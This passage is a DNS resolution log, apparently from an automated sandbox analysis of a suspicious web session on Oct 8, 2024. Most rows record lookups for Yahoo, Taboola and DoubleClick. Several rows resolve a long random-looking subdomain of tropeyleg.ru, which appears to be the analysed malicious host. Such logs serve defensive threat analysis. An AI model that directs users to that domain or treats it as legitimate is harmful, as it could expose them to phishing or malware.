                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:08.910222054 CEST1.1.1.1192.168.2.40xb4daNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:29.534847021 CEST1.1.1.1192.168.2.40x11c6No error (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:29.616183996 CEST1.1.1.1192.168.2.40xa624No error (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:29.616183996 CEST1.1.1.1192.168.2.40xa624No error (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.400130987 CEST1.1.1.1192.168.2.40x8f47No error (0)yahoo.com74.6.143.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.400130987 CEST1.1.1.1192.168.2.40x8f47No error (0)yahoo.com98.137.11.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.400130987 CEST1.1.1.1192.168.2.40x8f47No error (0)yahoo.com74.6.143.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.400130987 CEST1.1.1.1192.168.2.40x8f47No error (0)yahoo.com98.137.11.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.400130987 CEST1.1.1.1192.168.2.40x8f47No error (0)yahoo.com74.6.231.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.400130987 CEST1.1.1.1192.168.2.40x8f47No error (0)yahoo.com74.6.231.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.461148977 CEST1.1.1.1192.168.2.40xc43aNo error (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.741842985 CEST1.1.1.1192.168.2.40xdeeeNo error (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.741842985 CEST1.1.1.1192.168.2.40xdeeeNo error (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:32.029881954 CEST1.1.1.1192.168.2.40xbbaeNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:32.029881954 CEST1.1.1.1192.168.2.40xbbaeNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:32.029881954 CEST1.1.1.1192.168.2.40xbbaeNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:32.031112909 CEST1.1.1.1192.168.2.40x60ccNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.324922085 CEST1.1.1.1192.168.2.40xe680No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.325007915 CEST1.1.1.1192.168.2.40x2fdbNo error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.325007915 CEST1.1.1.1192.168.2.40x2fdbNo error (0)geo-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.325146914 CEST1.1.1.1192.168.2.40xe138No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.325824976 CEST1.1.1.1192.168.2.40x558aNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.325824976 CEST1.1.1.1192.168.2.40x558aNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.325824976 CEST1.1.1.1192.168.2.40x558aNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.328128099 CEST1.1.1.1192.168.2.40xfc14No error (0)geo.query.yahoo.comudc-ats.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.338248968 CEST1.1.1.1192.168.2.40x55c7No error (0)search.yahoo.comds-global3.l7.search.ystg1.b.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.338248968 CEST1.1.1.1192.168.2.40x55c7No error (0)ds-global3.l7.search.ystg1.b.yahoo.com212.82.100.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.339566946 CEST1.1.1.1192.168.2.40x7896No error (0)search.yahoo.comds-global3.l7.search.ystg1.b.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.372267008 CEST1.1.1.1192.168.2.40x1262No error (0)geo.query.yahoo.comudc-ats.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.372267008 CEST1.1.1.1192.168.2.40x1262No error (0)udc-ats.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.915031910 CEST1.1.1.1192.168.2.40x7dc7No error (0)consent.cmp.oath.comconsent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.924884081 CEST1.1.1.1192.168.2.40x1834No error (0)consent.cmp.oath.comconsent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.924884081 CEST1.1.1.1192.168.2.40x1834No error (0)consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud3.161.82.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.924884081 CEST1.1.1.1192.168.2.40x1834No error (0)consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud3.161.82.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.924884081 CEST1.1.1.1192.168.2.40x1834No error (0)consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud3.161.82.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.924884081 CEST1.1.1.1192.168.2.40x1834No error (0)consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud3.161.82.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.184400082 CEST1.1.1.1192.168.2.40x25edNo error (0)edge-mcdn.secure.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.184400082 CEST1.1.1.1192.168.2.40x25edNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.184400082 CEST1.1.1.1192.168.2.40x25edNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.184537888 CEST1.1.1.1192.168.2.40x24caNo error (0)edge-mcdn.secure.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.368870020 CEST1.1.1.1192.168.2.40x6c91No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.368870020 CEST1.1.1.1192.168.2.40x6c91No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.368870020 CEST1.1.1.1192.168.2.40x6c91No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.370160103 CEST1.1.1.1192.168.2.40xeef7No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:35.212186098 CEST1.1.1.1192.168.2.40x33efNo error (0)edge-mcdn.secure.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:35.212186098 CEST1.1.1.1192.168.2.40x33efNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:35.212186098 CEST1.1.1.1192.168.2.40x33efNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:35.212552071 CEST1.1.1.1192.168.2.40xa762No error (0)edge-mcdn.secure.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:36.804790974 CEST1.1.1.1192.168.2.40x39d0No error (0)udc.yahoo.comudc-ats.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:36.804790974 CEST1.1.1.1192.168.2.40x39d0No error (0)udc-ats.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:36.806442976 CEST1.1.1.1192.168.2.40xd846No error (0)udc.yahoo.comudc-ats.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:37.225131989 CEST1.1.1.1192.168.2.40xf17dNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:37.225526094 CEST1.1.1.1192.168.2.40xf9f5No error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:37.225526094 CEST1.1.1.1192.168.2.40xf9f5No error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:37.225526094 CEST1.1.1.1192.168.2.40xf9f5No error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.173667908 CEST1.1.1.1192.168.2.40xc2edNo error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.173850060 CEST1.1.1.1192.168.2.40x3f21No error (0)securepubads.g.doubleclick.net142.250.186.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.174674034 CEST1.1.1.1192.168.2.40x126dNo error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.174674034 CEST1.1.1.1192.168.2.40x126dNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.174674034 CEST1.1.1.1192.168.2.40x126dNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.174674034 CEST1.1.1.1192.168.2.40x126dNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.174674034 CEST1.1.1.1192.168.2.40x126dNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.175808907 CEST1.1.1.1192.168.2.40xd4d7No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.483503103 CEST1.1.1.1192.168.2.40x4652No error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.483557940 CEST1.1.1.1192.168.2.40xb801No error (0)securepubads.g.doubleclick.net142.250.186.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.917093039 CEST1.1.1.1192.168.2.40xaa6dNo error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.917093039 CEST1.1.1.1192.168.2.40xaa6dNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.917093039 CEST1.1.1.1192.168.2.40xaa6dNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.917093039 CEST1.1.1.1192.168.2.40xaa6dNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.917093039 CEST1.1.1.1192.168.2.40xaa6dNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.917191982 CEST1.1.1.1192.168.2.40xd1a0No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.955487013 CEST1.1.1.1192.168.2.40x1e20No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.958014965 CEST1.1.1.1192.168.2.40x9f7No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.958014965 CEST1.1.1.1192.168.2.40x9f7No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.958014965 CEST1.1.1.1192.168.2.40x9f7No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.958014965 CEST1.1.1.1192.168.2.40x9f7No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.958014965 CEST1.1.1.1192.168.2.40x9f7No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:43.397017002 CEST1.1.1.1192.168.2.40x436eNo error (0)opus.analytics.yahoo.comcs964.wpc.9465e.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:43.397017002 CEST1.1.1.1192.168.2.40x436eNo error (0)cs964.wpc.9465e.mucdn.netcs964199420.wpc.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:43.397017002 CEST1.1.1.1192.168.2.40x436eNo error (0)cs964199420.wpc.mucdn.net152.199.23.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:43.397577047 CEST1.1.1.1192.168.2.40xd947No error (0)opus.analytics.yahoo.comcs964.wpc.9465e.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:43.397577047 CEST1.1.1.1192.168.2.40xd947No error (0)cs964.wpc.9465e.mucdn.netcs964199420.wpc.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.520508051 CEST1.1.1.1192.168.2.40x4bdaNo error (0)noa.yahoo.comnoa-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.520508051 CEST1.1.1.1192.168.2.40x4bdaNo error (0)noa-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.520956039 CEST1.1.1.1192.168.2.40x6f7bNo error (0)noa.yahoo.comnoa-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.538295031 CEST1.1.1.1192.168.2.40x9d15No error (0)opus.analytics.yahoo.comcs964.wpc.9465e.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.538295031 CEST1.1.1.1192.168.2.40x9d15No error (0)cs964.wpc.9465e.mucdn.netcs964199420.wpc.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.538327932 CEST1.1.1.1192.168.2.40x66c7No error (0)opus.analytics.yahoo.comcs964.wpc.9465e.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.538327932 CEST1.1.1.1192.168.2.40x66c7No error (0)cs964.wpc.9465e.mucdn.netcs964199420.wpc.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.538327932 CEST1.1.1.1192.168.2.40x66c7No error (0)cs964199420.wpc.mucdn.net152.199.23.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.971977949 CEST1.1.1.1192.168.2.40x506aNo error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.971977949 CEST1.1.1.1192.168.2.40x506aNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.971977949 CEST1.1.1.1192.168.2.40x506aNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.971977949 CEST1.1.1.1192.168.2.40x506aNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.971977949 CEST1.1.1.1192.168.2.40x506aNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.972410917 CEST1.1.1.1192.168.2.40x3181No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.710596085 CEST1.1.1.1192.168.2.40x499dNo error (0)beacon.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.713371992 CEST1.1.1.1192.168.2.40x8f91No error (0)beacon.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.713371992 CEST1.1.1.1192.168.2.40x8f91No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.713371992 CEST1.1.1.1192.168.2.40x8f91No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.713371992 CEST1.1.1.1192.168.2.40x8f91No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.713371992 CEST1.1.1.1192.168.2.40x8f91No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.720922947 CEST1.1.1.1192.168.2.40x8d57No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.720922947 CEST1.1.1.1192.168.2.40x8d57No error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.720922947 CEST1.1.1.1192.168.2.40x8d57No error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.720922947 CEST1.1.1.1192.168.2.40x8d57No error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.720922947 CEST1.1.1.1192.168.2.40x8d57No error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.723778009 CEST1.1.1.1192.168.2.40x9a34No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:46.960988045 CEST1.1.1.1192.168.2.40x68b7No error (0)pm-widget.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:46.960988045 CEST1.1.1.1192.168.2.40x68b7No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:46.960988045 CEST1.1.1.1192.168.2.40x68b7No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:46.960988045 CEST1.1.1.1192.168.2.40x68b7No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:46.960988045 CEST1.1.1.1192.168.2.40x68b7No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:46.962222099 CEST1.1.1.1192.168.2.40x1050No error (0)pm-widget.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:47.702512980 CEST1.1.1.1192.168.2.40xb082No error (0)pm-widget.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:47.703495979 CEST1.1.1.1192.168.2.40x5b46No error (0)pm-widget.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:47.703495979 CEST1.1.1.1192.168.2.40x5b46No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:47.703495979 CEST1.1.1.1192.168.2.40x5b46No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:47.703495979 CEST1.1.1.1192.168.2.40x5b46No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:47.703495979 CEST1.1.1.1192.168.2.40x5b46No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:49.656011105 CEST1.1.1.1192.168.2.40xb576No error (0)pips.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:49.656011105 CEST1.1.1.1192.168.2.40xb576No error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:49.656011105 CEST1.1.1.1192.168.2.40xb576No error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
